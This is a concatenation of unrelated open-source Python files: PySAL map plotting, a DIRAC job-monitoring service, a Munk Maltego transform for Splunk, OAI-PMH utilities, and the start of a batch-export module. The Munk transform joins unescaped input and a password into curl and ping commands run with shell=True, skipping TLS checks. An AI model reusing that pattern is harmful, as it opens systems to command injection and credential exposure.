cds.add(edgecolor.reindex(ids), 'edgecolor')
pars['ec'] = 'edgecolor'
if type(alpha) is pd.Series:
cds.add(alpha.reindex(ids), 'alpha')
pars['alpha'] = 'alpha'
if type(linewidth) is pd.Series:
cds.add(linewidth.reindex(ids), 'linewidth')
pars['lw'] = 'linewidth'
if type(marker_size) is pd.Series:
cds.add(marker_size.reindex(ids), 'marker_size')
pars['ms'] = 'marker_size'
p.circle('x', 'y',
source=cds,
fill_color=pars['fc'],
line_color=pars['ec'],
line_width=pars['lw'],
fill_alpha=pars['alpha'],
line_alpha=pars['alpha'],
size=pars['ms'])
if draw:
bk.show(p)
return None
def plot_poly_lines(shp_link, savein=None, poly_col='none'):
'''
Quick plotting of shapefiles
...
Arguments
---------
shp_link : str
Path to shapefile
savein : str
Path to png file where to dump the plot. Optional,
defaults to None
poly_col : str
Face color of polygons
'''
fig = plt.figure()
shp = ps.open(shp_link)
patchco = map_poly_shp(shp)
patchco.set_facecolor('none')
patchco.set_edgecolor('0.8')
ax = setup_ax([patchco], [shp.bbox])
fig.add_axes(ax)
if savein:
plt.savefig(savein)
else:
print('calling plt.show()')
plt.show()
return None
def plot_choropleth(shp_link, values, type, k=5, cmap=None,
shp_type='poly', sample_fisher=False, title='',
savein=None, figsize=None, dpi=300, alpha=0.4):
'''
Wrapper to quickly create and plot from a lat/lon shapefile
...
Arguments
---------
shp_link : str
Path to shapefile
values : array
Numpy array with values to map
type : str
Type of choropleth. Supported methods:
* 'classless'
* 'unique_values'
* 'quantiles'
* 'fisher_jenks'
* 'equal_interval'
k : int
Number of bins to classify values in and assign a color
to (defaults to 5)
cmap : str
Matplotlib coloring scheme. If None (default), uses:
* 'classless': 'Greys'
* 'unique_values': 'Paired'
* 'quantiles': 'hot_r'
* 'fisher_jenks': 'hot_r'
* 'equal_interval': 'hot_r'
shp_type : str
'poly' (default) or 'line', for the kind of shapefile
passed
sample_fisher : Boolean
Defaults to False, controls whether Fisher-Jenks
classification uses a sample (faster) or the entire
array of values. Ignored if 'classification'!='fisher_jenks'
The percentage of the sample that takes at a time is 10%
title : str
Optional string for the title
savein : str
Path to png file where to dump the plot. Optional,
defaults to None
figsize : tuple
Figure dimensions
dpi : int
resolution of graphic file
alpha : float
[Optional. Default=0.4] Transparency of the map.
Returns
-------
map : PatchCollection
Map object with the polygons from the shapefile and
unique value coloring
'''
shp = ps.open(shp_link)
if shp_type == 'poly':
map_obj = map_poly_shp(shp)
if shp_type == 'line':
map_obj = map_line_shp(shp)
if type == 'classless':
if not cmap:
cmap = 'Greys'
map_obj = base_choropleth_classless(map_obj, values, cmap=cmap)
if type == 'unique_values':
if not cmap:
cmap = 'Paired'
map_obj = base_choropleth_unique(map_obj, values, cmap=cmap)
if type == 'quantiles':
if not cmap:
cmap = 'hot_r'
map_obj = base_choropleth_classif(map_obj, values, k=k, \
classification='quantiles', cmap=cmap)
if type == 'fisher_jenks':
if not cmap:
cmap = 'hot_r'
map_obj = base_choropleth_classif(map_obj, values, k=k, \
classification='fisher_jenks', cmap=cmap, \
sample_fisher=sample_fisher)
if type == 'equal_interval':
if not cmap:
cmap = 'hot_r'
map_obj = base_choropleth_classif(map_obj, values, k=k, \
classification='equal_interval', cmap=cmap)
map_obj.set_alpha(alpha)
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
ax = setup_ax([map_obj], [shp.bbox], ax)
if title:
ax.set_title(title)
if type=='quantiles' or type=='fisher_jenks' or type=='equal_interval':
cmap = map_obj.get_cmap()
norm = map_obj.norm
boundaries = np.round(map_obj.norm.boundaries, decimals=3)
cbar = plt.colorbar(map_obj, cmap=cmap, norm=norm, boundaries=boundaries, \
ticks=boundaries, orientation='horizontal', shrink=0.5)
if savein:
plt.savefig(savein, dpi=dpi)
else:
plt.show()
return None
# Coding to be used with PySAL scheme
# HH=1, LH=2, LL=3, HL=4
lisa_clrs = {1: '#FF0000', 2: '#66CCFF', 3: '#003399', 4: '#CD5C5C', \
0: '#D3D3D3'}
lisa_lbls = {1: 'HH', 2: 'LH', 3: 'LL', 4: 'HL', \
0: 'Non-significant'}
def plot_lisa_cluster(shp_link, lisa, p_thres=0.01, shp_type='poly',
title='', legend=True, savein=None, figsize=None, dpi=300, alpha=1.,
leg_loc=0):
'''
Plot LISA cluster maps easily
...
Arguments
---------
shp_link : str
Path to shapefile
lisa : Moran_Local
LISA object from PySAL. NOTE: assumes
`geoda_quads=False`
p_thres : float
Significant threshold for clusters
shp_type : str
'poly' (default) or 'line', for the kind of shapefile
passed
title : str
Optional string for the title
legend : Boolean
[Optional. Default=True] Flag to add a legend to the map
savein : str
Path to png file where to dump the plot. Optional,
defaults to None
figsize : tuple
Figure dimensions
dpi : int
resolution of graphic file
alpha : float
[Optional. Default=0.4] Transparency of the map.
leg_loc : int
[Optional. Default=0] Location of legend. 0: best, 1:
upper right, 2: upper left, 3: lower left, 4: lower
right, 5: right, 6: center left, 7: center right, 8: lower
center, 9: upper center, 10: center.
Returns
-------
map : PatchCollection
Map object with the polygons from the shapefile and
unique value coloring
'''
shp = ps.open(shp_link)
# Lisa layer
lisa_obj = map_poly_shp(shp)
lisa_obj = base_lisa_cluster(lisa_obj, lisa)
lisa_obj.set_alpha(alpha)
# Figure
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
ax = setup_ax([lisa_obj], [shp.bbox], ax)
# Legend
if legend:
boxes, labels = lisa_legend_components(lisa, p_thres)
plt.legend(boxes, labels, loc=leg_loc, fancybox=True)
if title:
ax.set_title(title)
if savein:
plt.savefig(savein, dpi=dpi)
else:
plt.show()
return None
if __name__ == '__main__':
data = 'none'
if data == 'poly':
shp_link = ps.examples.get_path("sids2.shp")
shp_link = ps.examples.get_path("Polygon.shp")
dbf = ps.open(shp_link.replace('.shp', '.dbf'))
'''
values = np.array(dbf.by_col("SIDR74"))
#values[: values.shape[0]/2] = 1
#values[values.shape[0]/2: ] = 0
'''
patchco = map_poly_shp(ps.open(shp_link))
#patchco = base_choropleth_classif(shp_link, np.random.random(3))
#patchco = plot_choropleth(shp_link, np.random.random(3), 'quantiles')
if data == 'point':
shp_link = ps.examples.get_path("burkitt.shp")
dbf = ps.open(shp_link.replace('.shp', '.dbf'))
patchco = map_point_shp(ps.open(shp_link))
if data == 'line':
shp_link = ps.examples.get_path("eberly_net.shp")
dbf = ps.open(shp_link.replace('.shp', '.dbf'))
values = np.array(dbf.by_col('TNODE'))
mobj = map_line_shp(ps.open(shp_link))
patchco = base_choropleth_unique(mobj, values)
'''
which = values > 1.
for shp_link in [shp_link]:
fig = plt.figure()
patchco = map_poly_shp(shp_link)
patchcoB = map_poly_shp(shp_link, which=which)
patchco.set_facecolor('none')
ax = setup_ax([patchco, patchcoB])
fig.add_axes(ax)
plt.show()
break
xy = (((0, 0), (0, 0)), ((2, 1), (2, 1)), ((3, 1), (3, 1)), ((2, 5), (2, 5)))
xy = np.array([[10, 30], [20, 20]])
markerobj = mpl.markers.MarkerStyle('o')
path = markerobj.get_path().transformed(
markerobj.get_transform())
scales = np.array([2, 2])
fig = plt.figure()
ax = fig.add_subplot(111)
pc = PathCollection((path,), scales, offsets=xy, \
facecolors='r', transOffset=mpl.transforms.IdentityTransform())
#pc.set_transform(mpl.transforms.IdentityTransform())
#_ = _add_axes2col(pc, [0, 0, 5, 5])
ax.add_collection(pc)
fig.add_axes(ax)
#ax = setup_ax([pc], ax)
plt.show()
'''
shp_link = ps.examples.get_path('columbus.shp')
values = np.array(ps.open(ps.examples.get_path('columbus.dbf')).by_col('HOVAL'))
w = ps.queen_from_shapefile(shp_link)
lisa = ps.Moran_Local(values, w, permutations=999)
_ = plot_lisa_cluster(shp_link, lisa)
#_ = plot_choropleth(shp_link, values, 'fisher_jenks')
|
TaylorOshan/pysal
|
pysal/contrib/viz/mapping.py
|
Python
|
bsd-3-clause
| 42,037
|
[
"COLUMBUS"
] |
605b3727f664df5bdc4d7f2465e513c7918b38099f34cac91d7b5d507865bc99
|
""" JobMonitoringHandler is the implementation of the JobMonitoring service
in the DISET framework
The following methods are available in the Service interface
"""
__RCSID__ = "$Id$"
from DIRAC import S_OK, S_ERROR
from DIRAC.Core.DISET.RequestHandler import RequestHandler
import DIRAC.Core.Utilities.Time as Time
from DIRAC.Core.Utilities.Decorators import deprecated
from DIRAC.ConfigurationSystem.Client.Helpers.Operations import Operations
from DIRAC.WorkloadManagementSystem.DB.JobDB import JobDB
from DIRAC.WorkloadManagementSystem.DB.TaskQueueDB import TaskQueueDB
from DIRAC.WorkloadManagementSystem.DB.JobLoggingDB import JobLoggingDB
from DIRAC.WorkloadManagementSystem.Service.JobPolicy import JobPolicy, RIGHT_GET_INFO
# These are global instances of the DB classes
gJobDB = False
gJobLoggingDB = False
gTaskQueueDB = False
SUMMARY = ['JobType', 'Site', 'JobName', 'Owner', 'SubmissionTime',
'LastUpdateTime', 'Status', 'MinorStatus', 'ApplicationStatus']
SUMMARY = []
PRIMARY_SUMMARY = []
FINAL_STATES = ['Done', 'Completed', 'Stalled', 'Failed', 'Killed']
def initializeJobMonitoringHandler(serviceInfo):
global gJobDB, gJobLoggingDB, gTaskQueueDB
gJobDB = JobDB()
gJobLoggingDB = JobLoggingDB()
gTaskQueueDB = TaskQueueDB()
return S_OK()
class JobMonitoringHandler(RequestHandler):
def initialize(self):
credDict = self.getRemoteCredentials()
self.ownerDN = credDict['DN']
self.ownerGroup = credDict['group']
operations = Operations(group=self.ownerGroup)
self.globalJobsInfo = operations.getValue('/Services/JobMonitoring/GlobalJobsInfo', True)
self.jobPolicy = JobPolicy(self.ownerDN, self.ownerGroup, self.globalJobsInfo)
self.jobPolicy.jobDB = gJobDB
return S_OK()
##############################################################################
types_getApplicationStates = []
@staticmethod
def export_getApplicationStates():
""" Return Distinct Values of ApplicationStatus job Attribute in WMS
"""
return gJobDB.getDistinctJobAttributes('ApplicationStatus')
##############################################################################
types_getJobTypes = []
@staticmethod
def export_getJobTypes():
""" Return Distinct Values of JobType job Attribute in WMS
"""
return gJobDB.getDistinctJobAttributes('JobType')
##############################################################################
types_getOwners = []
@staticmethod
def export_getOwners():
"""
Return Distinct Values of Owner job Attribute in WMS
"""
return gJobDB.getDistinctJobAttributes('Owner')
##############################################################################
types_getProductionIds = []
@staticmethod
def export_getProductionIds():
"""
Return Distinct Values of ProductionId job Attribute in WMS
"""
return gJobDB.getDistinctJobAttributes('JobGroup')
##############################################################################
types_getJobGroups = []
@staticmethod
def export_getJobGroups(condDict=None, cutDate=None):
"""
Return Distinct Values of ProductionId job Attribute in WMS
"""
return gJobDB.getDistinctJobAttributes('JobGroup', condDict,
newer=cutDate)
##############################################################################
types_getSites = []
@staticmethod
def export_getSites():
"""
Return Distinct Values of Site job Attribute in WMS
"""
return gJobDB.getDistinctJobAttributes('Site')
##############################################################################
types_getStates = []
@staticmethod
def export_getStates():
"""
Return Distinct Values of Status job Attribute in WMS
"""
return gJobDB.getDistinctJobAttributes('Status')
##############################################################################
types_getMinorStates = []
@staticmethod
def export_getMinorStates():
"""
Return Distinct Values of Minor Status job Attribute in WMS
"""
return gJobDB.getDistinctJobAttributes('MinorStatus')
##############################################################################
types_getJobs = []
@staticmethod
def export_getJobs(attrDict=None, cutDate=None):
"""
Return list of JobIds matching the condition given in attrDict
"""
# queryDict = {}
# if attrDict:
# if type ( attrDict ) != dict:
# return S_ERROR( 'Argument must be of Dict Type' )
# for attribute in self.queryAttributes:
# # Only those Attribute in self.queryAttributes can be used
# if attrDict.has_key(attribute):
# queryDict[attribute] = attrDict[attribute]
print attrDict
return gJobDB.selectJobs(attrDict, newer=cutDate)
##############################################################################
types_getCounters = [list]
@staticmethod
def export_getCounters(attrList, attrDict=None, cutDate=''):
"""
Retrieve list of distinct attributes values from attrList
with attrDict as condition.
For each set of distinct values, count number of occurences.
Return a list. Each item is a list with 2 items, the list of distinct
attribute values and the counter
"""
# Check that Attributes in attrList and attrDict, they must be in
# self.queryAttributes.
# for attr in attrList:
# try:
# self.queryAttributes.index(attr)
# except:
# return S_ERROR( 'Requested Attribute not Allowed: %s.' % attr )
#
# for attr in attrDict:
# try:
# self.queryAttributes.index(attr)
# except:
# return S_ERROR( 'Condition Attribute not Allowed: %s.' % attr )
cutDate = str(cutDate)
if not attrDict:
attrDict = {}
return gJobDB.getCounters('Jobs', attrList, attrDict, newer=cutDate, timeStamp='LastUpdateTime')
##############################################################################
types_getCurrentJobCounters = []
@staticmethod
def export_getCurrentJobCounters(attrDict=None):
""" Get job counters per Status with attrDict selection. Final statuses are given for
the last day.
"""
if not attrDict:
attrDict = {}
result = gJobDB.getCounters('Jobs', ['Status'], attrDict, timeStamp='LastUpdateTime')
if not result['OK']:
return result
last_update = Time.dateTime() - Time.day
resultDay = gJobDB.getCounters('Jobs', ['Status'], attrDict, newer=last_update,
timeStamp='LastUpdateTime')
if not resultDay['OK']:
return resultDay
resultDict = {}
for statusDict, count in result['Value']:
status = statusDict['Status']
resultDict[status] = count
if status in FINAL_STATES:
resultDict[status] = 0
for statusDayDict, ccount in resultDay['Value']:
if status == statusDayDict['Status']:
resultDict[status] = ccount
break
return S_OK(resultDict)
##############################################################################
types_getJobStatus = [int]
@staticmethod
def export_getJobStatus(jobID):
return gJobDB.getJobAttribute(jobID, 'Status')
##############################################################################
types_getJobOwner = [int]
@staticmethod
def export_getJobOwner(jobID):
return gJobDB.getJobAttribute(jobID, 'Owner')
##############################################################################
types_getJobSite = [int]
@staticmethod
def export_getJobSite(jobID):
return gJobDB.getJobAttribute(jobID, 'Site')
##############################################################################
types_getJobJDL = [int, bool]
@staticmethod
def export_getJobJDL(jobID, original):
return gJobDB.getJobJDL(jobID, original=original)
##############################################################################
types_getJobLoggingInfo = [int]
@staticmethod
def export_getJobLoggingInfo(jobID):
return gJobLoggingDB.getJobLoggingInfo(jobID)
##############################################################################
types_getJobsParameters = [list, list]
@staticmethod
@deprecated("Unused")
def export_getJobsParameters(jobIDs, parameters):
if not (jobIDs and parameters):
return S_OK({})
return gJobDB.getAttributesForJobList(jobIDs, parameters)
##############################################################################
types_getJobsStatus = [list]
@staticmethod
def export_getJobsStatus(jobIDs):
if not jobIDs:
return S_OK({})
return gJobDB.getAttributesForJobList(jobIDs, ['Status'])
##############################################################################
types_getJobsMinorStatus = [list]
@staticmethod
def export_getJobsMinorStatus(jobIDs):
return gJobDB.getAttributesForJobList(jobIDs, ['MinorStatus'])
##############################################################################
types_getJobsApplicationStatus = [list]
@staticmethod
def export_getJobsApplicationStatus(jobIDs):
return gJobDB.getAttributesForJobList(jobIDs, ['ApplicationStatus'])
##############################################################################
types_getJobsSites = [list]
@staticmethod
def export_getJobsSites(jobIDs):
return gJobDB.getAttributesForJobList(jobIDs, ['Site'])
##############################################################################
types_getJobSummary = [int]
@staticmethod
def export_getJobSummary(jobID):
return gJobDB.getJobAttributes(jobID, SUMMARY)
##############################################################################
types_getJobPrimarySummary = [int]
@staticmethod
def export_getJobPrimarySummary(jobID):
return gJobDB.getJobAttributes(jobID, PRIMARY_SUMMARY)
##############################################################################
types_getJobsSummary = [list]
@staticmethod
def export_getJobsSummary(jobIDs):
if not jobIDs:
return S_ERROR('JobMonitoring.getJobsSummary: Received empty job list')
result = gJobDB.getAttributesForJobList(jobIDs, SUMMARY)
# return result
restring = str(result['Value'])
return S_OK(restring)
##############################################################################
types_getJobPageSummaryWeb = [dict, list, int, int]
def export_getJobPageSummaryWeb(self, selectDict, sortList, startItem, maxItems, selectJobs=True):
""" Get the summary of the job information for a given page in the
job monitor in a generic format
"""
resultDict = {}
startDate = selectDict.get('FromDate', None)
if startDate:
del selectDict['FromDate']
# For backward compatibility
if startDate is None:
startDate = selectDict.get('LastUpdate', None)
if startDate:
del selectDict['LastUpdate']
endDate = selectDict.get('ToDate', None)
if endDate:
del selectDict['ToDate']
result = self.jobPolicy.getControlledUsers(RIGHT_GET_INFO)
if not result['OK']:
return S_ERROR('Failed to evaluate user rights')
if result['Value'] != 'ALL':
selectDict[('Owner', 'OwnerGroup')] = result['Value']
# Sorting instructions. Only one for the moment.
if sortList:
orderAttribute = sortList[0][0] + ":" + sortList[0][1]
else:
orderAttribute = None
statusDict = {}
result = gJobDB.getCounters('Jobs', ['Status'], selectDict,
newer=startDate,
older=endDate,
timeStamp='LastUpdateTime')
nJobs = 0
if result['OK']:
for stDict, count in result['Value']:
nJobs += count
statusDict[stDict['Status']] = count
resultDict['TotalRecords'] = nJobs
if nJobs == 0:
return S_OK(resultDict)
resultDict['Extras'] = statusDict
if selectJobs:
iniJob = startItem
if iniJob >= nJobs:
return S_ERROR('Item number out of range')
result = gJobDB.selectJobs(selectDict, orderAttribute=orderAttribute,
newer=startDate, older=endDate, limit=(maxItems, iniJob))
if not result['OK']:
return S_ERROR('Failed to select jobs: ' + result['Message'])
summaryJobList = result['Value']
if not self.globalJobsInfo:
validJobs, _invalidJobs, _nonauthJobs, _ownJobs = self.jobPolicy.evaluateJobRights(summaryJobList,
RIGHT_GET_INFO)
summaryJobList = validJobs
result = gJobDB.getAttributesForJobList(summaryJobList, SUMMARY)
if not result['OK']:
return S_ERROR('Failed to get job summary: ' + result['Message'])
summaryDict = result['Value']
# Evaluate last sign of life time
for jobID, jobDict in summaryDict.items():
if jobDict['HeartBeatTime'] == 'None':
jobDict['LastSignOfLife'] = jobDict['LastUpdateTime']
else:
lastTime = Time.fromString(jobDict['LastUpdateTime'])
hbTime = Time.fromString(jobDict['HeartBeatTime'])
# There is no way to express a timedelta of 0 ;-)
# Not only Stalled jobs but also Failed jobs because Stalled
if ((hbTime - lastTime) > (lastTime - lastTime) or
jobDict['Status'] == "Stalled" or
jobDict['MinorStatus'].startswith('Job stalled') or
jobDict['MinorStatus'].startswith('Stalling')):
jobDict['LastSignOfLife'] = jobDict['HeartBeatTime']
else:
jobDict['LastSignOfLife'] = jobDict['LastUpdateTime']
tqDict = {}
result = gTaskQueueDB.getTaskQueueForJobs(summaryJobList)
if result['OK']:
tqDict = result['Value']
# If no jobs can be selected after the properties check
if not summaryDict.keys():
return S_OK(resultDict)
# prepare the standard structure now
key = summaryDict.keys()[0]
paramNames = summaryDict[key].keys()
records = []
for jobID, jobDict in summaryDict.items():
jParList = []
for pname in paramNames:
jParList.append(jobDict[pname])
jParList.append(tqDict.get(jobID, 0))
records.append(jParList)
resultDict['ParameterNames'] = paramNames + ['TaskQueueID']
resultDict['Records'] = records
return S_OK(resultDict)
##############################################################################
types_getJobStats = [basestring, dict]
@staticmethod
def export_getJobStats(attribute, selectDict):
""" Get job statistics distribution per attribute value with a given selection
"""
startDate = selectDict.get('FromDate', None)
if startDate:
del selectDict['FromDate']
# For backward compatibility
if startDate is None:
startDate = selectDict.get('LastUpdate', None)
if startDate:
del selectDict['LastUpdate']
endDate = selectDict.get('ToDate', None)
if endDate:
del selectDict['ToDate']
result = gJobDB.getCounters('Jobs', [attribute], selectDict,
newer=startDate,
older=endDate,
timeStamp='LastUpdateTime')
resultDict = {}
if result['OK']:
for cDict, count in result['Value']:
resultDict[cDict[attribute]] = count
return S_OK(resultDict)
##############################################################################
types_getJobsPrimarySummary = [list]
@staticmethod
def export_getJobsPrimarySummary(jobIDs):
return gJobDB.getAttributesForJobList(jobIDs, PRIMARY_SUMMARY)
##############################################################################
types_getJobParameter = [[basestring, int, long], basestring]
@staticmethod
def export_getJobParameter(jobID, parName):
"""
:param str/int/long jobID: one single Job ID
:param str parName: one single parameter name
"""
res = gJobDB.getJobParameters(jobID, [parName])
if not res['OK']:
return res
return S_OK(res['Value'].get(int(jobID), {}))
##############################################################################
types_getJobParameters = [[basestring, int, long, list]]
@staticmethod
def export_getJobParameters(jobIDs, parName=None):
"""
:param str/int/long/list jobIDs: one single job ID or a list of them
:param str parName: one single parameter name, or None (meaning all of them)
"""
return gJobDB.getJobParameters(jobIDs, parName)
##############################################################################
types_traceJobParameter = [basestring, [basestring, int, long, list],
basestring, [basestring, None],
[basestring, None]]
@staticmethod
def export_traceJobParameter(site, localID, parameter, date, until):
return gJobDB.traceJobParameter(site, localID, parameter, date, until)
##############################################################################
types_traceJobParameters = [basestring, [basestring, int, long, list],
[list, None], [list, None],
[basestring, None], [basestring, None]]
@staticmethod
def export_traceJobParameters(site, localID, parameterList, attributeList, date, until):
return gJobDB.traceJobParameters(site, localID, parameterList, attributeList, date, until)
##############################################################################
types_getAtticJobParameters = [[int, long]]
@staticmethod
def export_getAtticJobParameters(jobID, parameters=None, rescheduleCycle=-1):
if not parameters:
parameters = []
return gJobDB.getAtticJobParameters(jobID, parameters, rescheduleCycle)
##############################################################################
types_getJobAttributes = [int]
@staticmethod
def export_getJobAttributes(jobID):
return gJobDB.getJobAttributes(jobID)
##############################################################################
types_getJobAttribute = [int, basestring]
@staticmethod
def export_getJobAttribute(jobID, attribute):
return gJobDB.getJobAttribute(jobID, attribute)
##############################################################################
types_getSiteSummary = []
@staticmethod
def export_getSiteSummary():
return gJobDB.getSiteSummary()
##############################################################################
types_getJobHeartBeatData = [int]
@staticmethod
def export_getJobHeartBeatData(jobID):
return gJobDB.getHeartBeatData(jobID)
##############################################################################
types_getInputData = [[int, long]]
@staticmethod
def export_getInputData(jobID):
""" Get input data for the specified jobs
"""
return gJobDB.getInputData(jobID)
##############################################################################
types_getOwnerGroup = []
@staticmethod
def export_getOwnerGroup():
"""
Return Distinct Values of OwnerGroup from the JobsDB
"""
return gJobDB.getDistinctJobAttributes('OwnerGroup')
|
andresailer/DIRAC
|
WorkloadManagementSystem/Service/JobMonitoringHandler.py
|
Python
|
gpl-3.0
| 19,283
|
[
"DIRAC"
] |
4ccf006f1ce159462313222d0bd09734dc1d5262d47a9d9c2ce16f24f98aec04
|
# List Splunk Hosts by Sourcetype
# For use with Munk - Maltego for Splunk
# Author: Brian Warehime @nulltr0n
# 9/6/2014
# Importing various modules
from MaltegoTransform import *
import subprocess
import sys
import re
import ConfigParser
import os
# Configuration Parser to grab necessary options.
def getLocalConfPath():
pathname = os.path.dirname(sys.argv[0])
pathname = os.path.abspath(pathname)
pathname = os.path.join(pathname, '..','local', 'munk.conf')
return os.path.normpath(pathname)
configFile = getLocalConfPath()
config = ConfigParser.SafeConfigParser()
config.read(configFile)
username = config.get('credentials', 'username')
password = config.get('credentials', 'password')
auth = config.get('splunk','auth')
searchhead = config.get('splunk','searchhead')
timeframe = config.get('splunk', 'timeframe')
status = config.get('splunk', 'status')
management = config.get('splunk', 'management')
proxy = config.get('splunk', 'proxy')
proxy_ip = config.get('splunk','proxy_ip')
proxy_port = config.get('splunk', 'proxy_port')
# Setting up Maltego entities and getting initial variables.
me = MaltegoTransform()
me.parseArguments(sys.argv)
sourcetype = sys.argv[1]
hostip = me.getVar("host")
# Determine which REST call to make based on authentication setting.
if auth == "1":
if proxy == "1":
output = subprocess.check_output('curl -u ' + username + ':' + password + ' -s -k --socks5 ' + proxy_ip + ':' + proxy_port + ' --data-urlencode search="search index=* earliest=' + timeframe + ' sourcetype=' + sourcetype + ' | table host | dedup host" -d "output_mode=csv" https://' + searchhead + ':' + management + '/servicesNS/admin/search/search/jobs/export', shell=True)
else:
output = subprocess.check_output('curl -u ' + username + ':' + password + ' -s -k --data-urlencode search="search index=* earliest=' + timeframe + ' sourcetype=' + sourcetype + ' | table host | dedup host" -d "output_mode=csv" https://' + searchhead + ':' + management + '/servicesNS/admin/search/search/jobs/export', shell=True)
else:
if proxy == "1":
output = subprocess.check_output('curl -s -k --socks5 ' + proxy_ip + ':' + proxy_port + ' --data-urlencode search="search index=* earliest=' + timeframe + ' sourcetype=' + sourcetype + ' | table host | dedup host" -d "output_mode=csv" https://' + searchhead + ':' + management + '/servicesNS/admin/search/search/jobs/export', shell=True)
else:
output = subprocess.check_output('curl -s -k --data-urlencode search="search index=* earliest=' + timeframe + ' sourcetype=' + sourcetype + ' | table host | dedup host" -d "output_mode=csv" https://' + searchhead + ':' + management + '/servicesNS/admin/search/search/jobs/export', shell=True)
# Regex to find hosts
hosts = re.findall(r'.+', output)
host = []
for i in hosts:
if i[0] == '"':
host.append(i[1:-1])
else:
host.append(i)
# Remove header value
host.remove('host')
# Adding new Host entities and properties.
for a in host:
ent = me.addEntity("munk.Host",a)
ent.addAdditionalFields('link#maltego.link.color','LinkColor','','0x86B34A')
# If status is set, ping the server and set the bookmark color based on response.
if status == "1":
try:
status = subprocess.check_output('ping -c 1 ' + a, shell=True)
if "bytes from" in status:
ent.addAdditionalFields('bookmark#','Bookmark','',"1")
elif "cannot" in status:
ent.addAdditionalFields('bookmark#','Bookmark','',"4")
except subprocess.CalledProcessError, e:
ent.addAdditionalFields('bookmark#','Bookmark','',"4")
else:
pass
# Return Maltego Output
me.returnOutput()
|
brianwarehime/munk
|
transforms/listhostsourcetype.py
|
Python
|
gpl-2.0
| 3,584
|
[
"Brian"
] |
febe9ee4159e7a4825b0330a0106a2380374241b50cb636fc9d6fd1579da4da0
|
"""
A set of useful functions for working with OAI-PMH data
"""
from datetime import datetime
import base64, json
from octopus.core import app
class DateFormat(object):
"""
Class which helps us manage the date formats allowed by the standard
"""
@classmethod
def granularity(self):
"""
What is the date granularity of the service
:return: The date granularity
"""
return "YYYY-MM-DDThh:mm:ssZ"
@classmethod
def default_earliest(cls):
"""
What is the earliest date, if no other date is available
:return: default earliest date (start of unix epoch)
"""
return "1970-01-01T00:00:00Z"
@classmethod
def now(cls):
"""
String representation of current timestamp
:return: string timestamp
"""
return datetime.now().strftime("%Y-%m-%dT%H:%M:%SZ")
@classmethod
def format(cls, date):
"""
Format the given datestamp to the correct OAI-PMH date format
:param date: datestamp
:return: string
"""
return date.strftime("%Y-%m-%dT%H:%M:%SZ")
@classmethod
def legitimate_granularity(cls, datestr):
"""
Check whether the supplied date is of an allowed granularity
:param datestr: the supplied date
:return: True if allowed, False if not
"""
formats = ["%Y-%m-%d", "%Y-%m-%dT%H:%M:%SZ"]
success = False
for f in formats:
try:
datetime.strptime(datestr, f)
success = True
break
except Exception:
pass
return success
def make_set_spec(setspec):
"""
Convert the setspec into something that can be included in a ListSets response
:param setspec: the name of the set
:return: the encoded name of the set
"""
return base64.urlsafe_b64encode(setspec).replace("=", "~")
def decode_set_spec(setspec):
"""
Decode the setspec into something usable by the system
:param setspec: the encoded name of the set
:return: the decoded name of the set
"""
return base64.urlsafe_b64decode(str(setspec).replace("~", "="))
def make_resumption_token(metadata_prefix=None, from_date=None, until_date=None, oai_set=None, start_number=None):
"""
Create a resumption token that can represent the supplied request parameters
:param metadata_prefix: the metadata prefix of the request
:param from_date: the from date of the request
:param until_date: the until date of the request
:param oai_set: the oai set name of the request
:param start_number: the start number for the record cursor
:return: an encoded resumption token suitable for providing the page of results from the parameters
"""
d = {}
if metadata_prefix is not None:
d["m"] = metadata_prefix
if from_date is not None:
d["f"] = from_date
if until_date is not None:
d["u"] = until_date
if oai_set is not None:
d["s"] = oai_set
if start_number is not None:
d["n"] = start_number
j = json.dumps(d)
b = base64.urlsafe_b64encode(j)
return b
class ResumptionTokenException(Exception):
"""
Exception class for any issues with Resumption Tokens
"""
pass
def decode_resumption_token(resumption_token):
"""
Take the encoded resumption token, and convert it back into a set of parameters suitable for
use as **kwargs
:param resumption_token: the resumption token from the request
:return: dict containing the parameters of the request
"""
# attempt to parse the resumption token out of base64 encoding and as a json object
try:
j = base64.urlsafe_b64decode(str(resumption_token))
except TypeError:
raise ResumptionTokenException()
try:
d = json.loads(j)
except ValueError:
raise ResumptionTokenException()
# if we succeed read out the parameters
params = {}
if "m" in d: params["metadata_prefix"] = d.get("m")
if "f" in d: params["from_date"] = d.get("f")
if "u" in d: params["until_date"] = d.get("u")
if "s" in d: params["oai_set"] = d.get("s")
if "n" in d: params["start_number"] = d.get("n")
return params
def make_oai_identifier(identifier, qualifier):
"""
Make a suitable tag identifier for records in the OAI response.
Identifiers are of the form:
::
oai:[namespace]/[qualifier]:[identifier]
Namespace is taken from configuration (OAIPMH_IDENTIFIER_NAMESPACE)
:param identifier: the system identifier to incorporate
:param qualifier: the qualifier for the identifier
:return:
"""
return "oai:" + app.config.get("OAIPMH_IDENTIFIER_NAMESPACE") + "/" + qualifier + ":" + identifier
def extract_internal_id(oai_identifier):
"""
Extract the internal identifier from the full tag identifier from the OAI request
:param oai_identifier: the full OAI identifier for a record
:return: the internal identifier
"""
# most of the identifier is for show - we only care about the hex string at the end
return oai_identifier.split(":")[-1]
def get_response_date():
"""
Date of response to include in responses
:return: the current time, correctly formatted
"""
# return datetime.now().strftime("%Y-%m-%dT%H:%M:%SZ")
return DateFormat.now()
def normalise_date(date):
"""
Normalise the date provided into something we can use
:param date: the supplied date
:return: the normalised date
"""
# FIXME: do we need a more powerful date normalisation routine?
try:
datetime.strptime(date, "%Y-%m-%dT%H:%M:%SZ")
return date
except:
return "T".join(date.split(" ")) + "Z"
|
JiscPER/jper-oaipmh
|
service/oaitools.py
|
Python
|
apache-2.0
| 5,812
|
[
"Octopus"
] |
aac08dd22613fdd3c4fb090060fd40892b34763724bfb2754c0850969259a033
|
# Transformer/Framework/BatchIO.py
# -------
# Imports
# -------
import os;
import warnings;
from Transformer.IO import StructureSetIO;
# -----------------------------
# Batch Import/Export Functions
# -----------------------------
def ExportResultSet(resultSet, fileFormat = 'vasp', prefix = None, archiveDirectory = "./", atomicSymbolLookupTable = None, **kwargs):
# Set up a generator.
generator = ExportResultSetPassthrough(
resultSet, fileFormat = fileFormat, prefix = prefix, archiveDirectory = archiveDirectory, atomicSymbolLookupTable = atomicSymbolLookupTable, **kwargs
);
# Run the generator to output the structure sets, but do nothing with the yield values.
for _ in generator:
pass;
def ExportResultSetPassthrough(resultSetGenerator, fileFormat = 'vasp', prefix = None, archiveDirectory = "./", atomicSymbolLookupTable = None, **kwargs):
